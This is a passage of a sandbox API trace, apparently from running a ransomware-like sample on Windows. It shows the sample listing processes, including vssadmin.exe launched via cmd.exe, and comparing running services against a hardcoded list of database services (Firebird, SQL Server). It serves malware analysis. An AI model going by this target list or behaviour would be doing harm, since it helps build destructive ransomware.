pcPriClassBase=8, dwFlags=0x0, szExeFile="television consolidated wav.exe")) returned 1 [0036.481] lstrlenW (lpString="television consolidated wav.exe") returned 31 [0036.481] Process32NextW (in: hSnapshot=0x1c0, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="transmit.exe")) returned 1 [0036.482] lstrlenW (lpString="transmit.exe") returned 12 [0036.482] Process32NextW (in: hSnapshot=0x1c0, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="travel-fits-insights.exe")) returned 1 [0036.482] lstrlenW (lpString="travel-fits-insights.exe") returned 24 [0036.482] Process32NextW (in: hSnapshot=0x1c0, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="discipline-netherlands-sail.exe")) returned 1 [0036.483] lstrlenW (lpString="discipline-netherlands-sail.exe") returned 31 [0036.483] Process32NextW (in: hSnapshot=0x1c0, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x408, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fed_loved_statute.exe")) returned 1 [0036.484] lstrlenW (lpString="fed_loved_statute.exe") returned 21 [0036.484] Process32NextW (in: hSnapshot=0x1c0, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="trial_stadium_tr.exe")) returned 1 [0036.484] lstrlenW (lpString="trial_stadium_tr.exe") returned 20 [0036.484] Process32NextW (in: hSnapshot=0x1c0, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="delight.exe")) returned 1 [0036.485] lstrlenW (lpString="delight.exe") returned 11 [0036.485] Process32NextW (in: hSnapshot=0x1c0, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="within enquiry.exe")) returned 1 [0036.486] lstrlenW (lpString="within enquiry.exe") returned 18 [0036.486] Process32NextW (in: hSnapshot=0x1c0, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x80c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0036.486] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0036.486] Process32NextW (in: hSnapshot=0x1c0, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0036.487] lstrlenW (lpString="dllhost.exe") returned 11 [0036.487] Process32NextW (in: hSnapshot=0x1c0, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0036.488] lstrlenW (lpString="dllhost.exe") returned 11 [0036.488] Process32NextW (in: hSnapshot=0x1c0, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="agent1c.exe")) returned 1 [0036.488] lstrlenW (lpString="agent1c.exe") returned 11 [0036.488] Process32NextW (in: hSnapshot=0x1c0, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xa70, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0036.489] lstrlenW (lpString="cmd.exe") returned 7 [0036.489] Process32NextW (in: hSnapshot=0x1c0, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaa4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x188, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0036.490] lstrlenW (lpString="conhost.exe") returned 11 [0036.490] Process32NextW (in: hSnapshot=0x1c0, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0xa84, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 1 [0036.491] lstrlenW (lpString="vssadmin.exe") returned 12 [0036.491] Process32NextW (in: hSnapshot=0x1c0, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaf8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="VSSVC.exe")) returned 1 [0036.491] lstrlenW (lpString="VSSVC.exe") returned 9 [0036.491] Process32NextW (in: hSnapshot=0x1c0, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaf8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="VSSVC.exe")) returned 0 [0036.492] CloseHandle (hObject=0x1c0) returned 1 [0036.492] Sleep (dwMilliseconds=0x1f4) [0037.236] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x3720560 [0037.237] EnumServicesStatusExW (in: hSCManager=0x3720560, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x21dff44, lpServicesReturned=0x21dff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x21dff44, lpServicesReturned=0x21dff5c, lpResumeHandle=0x0) returned 0 [0037.237] GetLastError () returned 0xea [0037.237] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x123e) returned 0x3806fc0 [0037.237] EnumServicesStatusExW (in: hSCManager=0x3720560, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x3806fc0, cbBufSize=0x123e, pcbBytesNeeded=0x21dff44, lpServicesReturned=0x21dff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x3806fc0, pcbBytesNeeded=0x21dff44, lpServicesReturned=0x21dff5c, lpResumeHandle=0x0) returned 1 [0037.238] CloseServiceHandle (hSCObject=0x3720560) returned 1 [0037.238] lstrlenW (lpString="Appinfo") returned 7 [0037.238] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0037.238] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0037.238] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0037.238] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0037.238] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0037.238] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0037.238] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0037.238] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0037.238] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0037.238] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0037.238] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0037.238] lstrlenW (lpString="AudioSrv") returned 8 [0037.238] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1 [0037.238] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0037.238] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0037.238] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0037.238] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0037.238] lstrlenW (lpString="BFE") returned 3 [0037.238] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0037.238] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0037.238] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0037.238] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0037.238] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0037.238] lstrlenW (lpString="CryptSvc") returned 8 [0037.238] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0037.238] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0037.238] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0037.238] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0037.239] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0037.239] lstrlenW (lpString="CscService") returned 10 [0037.239] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0037.239] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0037.239] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1 [0037.239] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1 [0037.239] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1 [0037.239] lstrlenW (lpString="DcomLaunch") returned 10 [0037.239] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0037.239] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0037.239] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0037.239] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0037.239] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0037.239] lstrlenW (lpString="Dhcp") returned 4 [0037.239] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0037.239] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0037.239] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0037.239] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0037.239] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0037.239] lstrlenW (lpString="Dnscache") returned 8 [0037.239] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0037.239] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0037.239] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0037.239] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0037.239] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0037.239] lstrlenW (lpString="DPS") returned 3 [0037.239] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0037.239] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0037.239] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0037.239] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0037.239] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0037.239] lstrlenW (lpString="eventlog") returned 8 [0037.239] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 [0037.239] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0037.240] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0037.240] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0037.240] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0037.240] lstrlenW (lpString="EventSystem") returned 11 [0037.240] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0037.240] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0037.240] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0037.240] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0037.240] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0037.240] lstrlenW (lpString="gpsvc") returned 5 [0037.240] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0037.240] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0037.240] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0037.240] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0037.240] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0037.240] lstrlenW (lpString="iphlpsvc") returned 8 [0037.240] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0037.240] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0037.240] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0037.240] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0037.240] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0037.240] lstrlenW (lpString="LanmanServer") returned 12 [0037.240] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0037.240] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0037.240] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0037.240] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0037.240] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0037.240] lstrlenW (lpString="LanmanWorkstation") returned 17 [0037.240] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0037.240] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0037.240] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0037.240] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0037.240] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0037.240] lstrlenW (lpString="lmhosts") returned 7 [0037.240] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0037.241] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0037.241] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0037.241] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0037.241] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0037.241] lstrlenW (lpString="MMCSS") returned 5 [0037.241] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 [0037.241] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 [0037.241] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0037.241] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0037.241] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0037.241] lstrlenW (lpString="MpsSvc") returned 6 [0037.241] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0037.241] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0037.241] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0037.241] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0037.241] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0037.241] lstrlenW (lpString="Netman") returned 6 [0037.241] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Netman") returned -1 [0037.241] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Netman") returned -1 [0037.241] lstrcmpiW (lpString1="sqlwriter", lpString2="Netman") returned 1 [0037.241] lstrcmpiW (lpString1="mssqlserver", lpString2="Netman") returned -1 [0037.241] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Netman") returned 1 [0037.241] lstrlenW (lpString="netprofm") returned 8 [0037.241] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0037.241] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0037.241] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0037.241] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0037.241] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0037.241] lstrlenW (lpString="NlaSvc") returned 6 [0037.241] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0037.241] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0037.241] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0037.241] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0037.241] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0037.241] lstrlenW (lpString="nsi") returned 3 [0037.242] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0037.242] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0037.242] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0037.242] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0037.242] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0037.242] lstrlenW (lpString="PcaSvc") returned 6 [0037.242] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0037.242] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0037.242] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0037.242] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0037.242] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0037.242] lstrlenW (lpString="PlugPlay") returned 8 [0037.242] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0037.242] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0037.242] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0037.242] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0037.242] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0037.242] lstrlenW (lpString="Power") returned 5 [0037.242] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0037.242] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0037.242] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0037.242] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0037.242] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0037.242] lstrlenW (lpString="ProfSvc") returned 7 [0037.242] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0037.242] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0037.242] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0037.242] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0037.242] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0037.242] lstrlenW (lpString="RpcEptMapper") returned 12 [0037.242] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0037.242] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0037.242] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0037.242] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0037.242] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0037.242] lstrlenW (lpString="RpcSs") returned 5 [0037.243] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0037.243] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0037.243] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0037.243] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0037.243] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0037.243] lstrlenW (lpString="SamSs") returned 5 [0037.243] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0037.243] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0037.243] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0037.243] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0037.243] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0037.243] lstrlenW (lpString="Schedule") returned 8 [0037.243] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0037.243] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0037.243] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0037.243] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0037.243] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0037.243] lstrlenW (lpString="SENS") returned 4 [0037.243] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0037.243] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0037.243] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0037.243] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0037.243] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0037.243] lstrlenW (lpString="ShellHWDetection") returned 16 [0037.243] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0037.243] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0037.243] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0037.243] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0037.243] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0037.243] lstrlenW (lpString="Spooler") returned 7 [0037.243] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0037.243] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0037.243] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0037.243] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0037.244] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0037.244] lstrlenW (lpString="SysMain") returned 7 [0037.244] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0037.244] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0037.244] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0037.244] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0037.244] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0037.244] lstrlenW (lpString="Themes") returned 6 [0037.244] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0037.244] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0037.244] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0037.244] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0037.244] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0037.244] lstrlenW (lpString="TrkWks") returned 6 [0037.244] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TrkWks") returned -1 [0037.244] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TrkWks") returned -1 [0037.244] lstrcmpiW (lpString1="sqlwriter", lpString2="TrkWks") returned -1 [0037.244] lstrcmpiW (lpString1="mssqlserver", lpString2="TrkWks") returned -1 [0037.244] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="TrkWks") returned -1 [0037.244] lstrlenW (lpString="UxSms") returned 5 [0037.244] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0037.244] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0037.244] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1 [0037.244] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1 [0037.244] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0037.244] lstrlenW (lpString="VSS") returned 3 [0037.244] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="VSS") returned -1 [0037.244] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="VSS") returned -1 [0037.244] lstrcmpiW (lpString1="sqlwriter", lpString2="VSS") returned -1 [0037.244] lstrcmpiW (lpString1="mssqlserver", lpString2="VSS") returned -1 [0037.244] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="VSS") returned -1 [0037.244] lstrlenW (lpString="WdiServiceHost") returned 14 [0037.244] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiServiceHost") returned -1 [0037.244] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiServiceHost") returned -1 [0037.245] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiServiceHost") returned -1 [0037.245] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiServiceHost") returned -1 [0037.245] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiServiceHost") returned -1 [0037.245] lstrlenW (lpString="WdiSystemHost") returned 13 [0037.245] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiSystemHost") returned -1 [0037.245] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiSystemHost") returned -1 [0037.245] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiSystemHost") returned -1 [0037.245] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiSystemHost") returned -1 [0037.245] lstrcmpiW (lpString1="sqlserveradhelper", 